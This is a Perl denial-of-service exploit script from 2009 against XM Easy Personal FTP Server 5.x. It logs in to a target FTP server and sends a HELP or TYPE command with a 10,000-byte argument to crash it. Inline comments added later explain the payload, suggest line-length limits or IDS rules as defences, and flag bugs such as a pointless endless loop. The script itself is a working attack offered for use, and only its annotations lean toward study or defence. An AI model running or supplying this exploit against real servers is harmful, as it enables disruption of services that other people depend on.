|
#!usr/bin/perl -w=0D
=0D
#######################################################################################
# XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service
# via a "HELP" or "TYPE" command with an overly long argument.
# Refer:
# http://secunia.com/advisories/35271/
# Original advisory available at: http://securitygyan.com/2009/06/09/xm-easy-personal-ftp-server-help-and-type-command-rdos-exploit/
# Product link: http://www.dxm2008.com/
#
#$$$$$This was strictly written for educational purposes. Use it at your own risk.$$$$$$$$$$
#$$$$$Author will not bear any responsibility for any damages whatsoever.$$$$$$$$$$$$$$
#
# Author: Vinod Sharma
# Email: vinodsharma[underscore]mimit[at]gmail.com
# Blog: http://securitygyan.com/
# Date: 09th june, 2009
#
#
###Thanks all the Security Folks###
########################################################################################
=0D
use IO::Socket;=0D
=0D
# Proof-of-concept for the denial-of-service condition described in the header:
# it logs in to an FTP server and sends one command line with a 10000-byte
# argument.
# NOTE(review): the "=0D" at the end of each line appears to be quoted-printable
# residue for a carriage return left by the page's encoding, not program text.

# Positional arguments: target address, target port, FTP user name, FTP
# password, and the FTP command name to use (the usage text names HELP or TYPE).
my $server_ip=$ARGV[0];=0D
my $server_port=$ARGV[1];=0D
my $username=$ARGV[2];=0D
my $password=$ARGV[3];=0D
my $command=$ARGV[4];=0D
# Request line: command name, one space, 10000 bytes of 0x41 ('A'), then CRLF.
# "x" binds tighter than ".", so only the "\x41" string is repeated.
# Defender note: the argument is far longer than anything a HELP or TYPE request
# normally carries, so a maximum control-channel line length enforced by the
# server, a proxy or an IDS rule is a generic way to reject or flag it.
# NOTE(review): this runs before the argument-count check below, so with missing
# arguments $command is undef here (a -w warning only; the script then exits).
my $buffer=$command ." " ."\x41" x 10000 ."\r\n"; =0D
=0D
# Require exactly five arguments; otherwise print the usage text and stop.
if(($#ARGV + 1)!=5)=0D
{=0D
print "\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n";=0D
print "\nargument command can have a value HELP or TYPE\n";=0D
print "\nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP";=0D
=0D
exit;=0D
}=0D
=0D
=0D
# Open a TCP connection to the FTP control port; die if the connect fails.
# NOTE(review): $socket and the $send_*/$recv_* variables below are undeclared
# package globals (no "use strict"), and "new IO::Socket::INET" is indirect
# object syntax.
$socket = new IO::Socket::INET (PeerAddr =>$server_ip, PeerPort => $server_port, Proto => 'tcp', ) or die "Couldn't connect to Server\n";=0D
=0D
=0D
# NOTE(review): the loop has no "last" or "exit". After the first pass the socket
# is closed, so every later pass operates on a closed handle; the "while (1)"
# looks unintended and should be confirmed.
while (1)=0D
{=0D
=0D
# Read up to 1024 bytes before sending anything (presumably the server's
# greeting banner) and echo it. Return values of recv/send are never checked.
$socket->recv($recv_data,1024);=0D
print "RECIEVED: $recv_data"; =0D
=0D
# Log in with the supplied credentials: USER, then PASS, echoing each reply.
# Defender note: as written, the long command is only sent after this login
# exchange (the usage example shows an anonymous login). Whether the server
# also accepts HELP or TYPE before login is not shown here.
$send_data1 ="USER ".$username."\r\n";=0D
$socket->send($send_data1);=0D
$socket->recv($recv_data1,1024);=0D
print "RECIEVED: $recv_data1"; =0D
=0D
$send_data2 ="PASS ".$password."\r\n";=0D
$socket->send($send_data2);=0D
$socket->recv($recv_data2,1024);=0D
print "RECIEVED: $recv_data2"; =0D
=0D
=0D
# Send the oversized command line built above, then read whatever comes back.
# Defender note: in server logs or a capture this appears as a single HELP or
# TYPE request followed by about 10 KB of repeated 0x41 bytes.
$socket->send($buffer);=0D
print "\nAttack is send.....................\n";=0D
$socket->recv($recv_data3,1024);=0D
print "RECIEVED: $recv_data3"; =0D
=0D
# Close the control connection; nothing after this point can reach the server.
close $socket;=0D
=0D
} =0D